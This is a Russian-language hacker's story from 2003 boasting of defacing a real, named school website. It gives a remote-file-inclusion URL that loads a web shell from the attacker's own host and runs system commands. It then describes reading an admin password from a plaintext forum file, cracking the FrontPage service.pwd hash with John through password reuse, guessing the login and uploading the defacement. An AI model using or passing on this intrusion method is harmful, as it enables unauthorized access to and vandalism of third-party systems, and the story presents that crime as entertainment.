Defacing - itz not just changing index page.. itz a philosophy..
--==--==--==--==--==--==--==--==--==--==--==--==--==--==--==--==--==--==--==--==

                        Как был задефейсен www.ddec56.org

                                 (декабрь 2003)

В рассказываемой истории нет ничего особенного. Тем не менее, эта задачка заняла
у  меня  2  часа 56 минут. Дело было вечером, делать было нечего... Тут ко мне в
асю  вежливо  постучал  <(Sacrifice)> - чел из нашей команды (B.o.I) и предложил
немного  поразвлекаться  с  чужими  сайтами. До этого дня ни до чего более-менее
серьезного  дело  не доходило, мы обычно смотрели листинги директорий, выуживали
список  логинов  из  /etc/passwd  (на  всякий  случай),  рассматривали исходники
скриптов. И вот, с легкой руки моего друга мне попала ссылка,которую я тотчас же
подредактировал

http://www.ddec56.org/tice/tice.php3?page=http://мой_хост/инклуженный_шелл.php&
command=id;uname%20-a;ls%20-la

Сайт был посвящен (если не ошибаюсь) французским школам при католической церкви.

Я увидел строку, от которой попросту ошалел:
uid=0(root) gid=11(httpd) euid=15(httpd) groups=11(httpd)

К  этому  я должен был стремиться, в принципе. Но когда попробовал команду echo,
слегка  разочаровался.  Напрямую  сделать  это  не получалось, прав на запись не
хватало.  Пошарил в /etc/shadow (ага, так мне и дали его посмотреть!!!), прав на
чтение у меня не оказалось.

Команда  uname  рассказала мне, что тут стоит что-то линуксовое на ядре 2.?? (не
помню  уже).  А  из скитаний по каталогу /etc я узнал, что тут стоит дистрибутив
Linux Cobalt. Пусть мне это не пригодилось, но знание - сила.

После  безуспешных  попыток загрузить  более удобный  веб-шелл с помощью wget, я
просто решил пошарить по каталогам.  В одном из них находился самопальный форум.
Там же был и текстовый файлик с логином и паролем для администрирования форума.К
сожалению, я не  очень хорошо знаю французский язык,  поэтому решил не оставлять
сообщение типа "Тут был EVulture". Затем меня посетило второе озарение -я увидел
каталог   _vti_pvt  и  понял,  что  имею  дело с  FrontPage.   Посмотрев  файлик
service.pwd,  я  увидел  строчку  типа  webmaster:хеш.  В  конце  туннеля  слабо
обозначился лучик света (я надеялся, что на подбор грубой силой после подбора по
словарю уйдет немного времени). Но, немного подумав, я решил записать полученный
пароль от форума в словарь и натравить John'а  на этот хеш.  Пароль оказался тем
же самым. Теперь нужно было подобрать логин,  т.к. "webmaster" не подошел. Когда
я использовал  команду ls -la, было  видно, что  файлы принадлежат  пользователю
admindde. Этот вариант  тоже  не  подошел,  как не  подошли ddec56 и ddec. А вот
adminddec оказался  именно тем  самым логином,  который я искал. Осталось только
придумать и закачать дефейс.  На первое ушло около получаса,  а на второе - пара
минут.  Зеркало  дефейса  можно  увидеть  на  sacrifice.fatal.ru и, возможно, на
flt.fatal.ru.

Данный  текст является всего лишь  hack story,  поэтому крики типа "мы это давно
уже знаем" здесь неуместны.

                                                                 Evulture[B.o.I]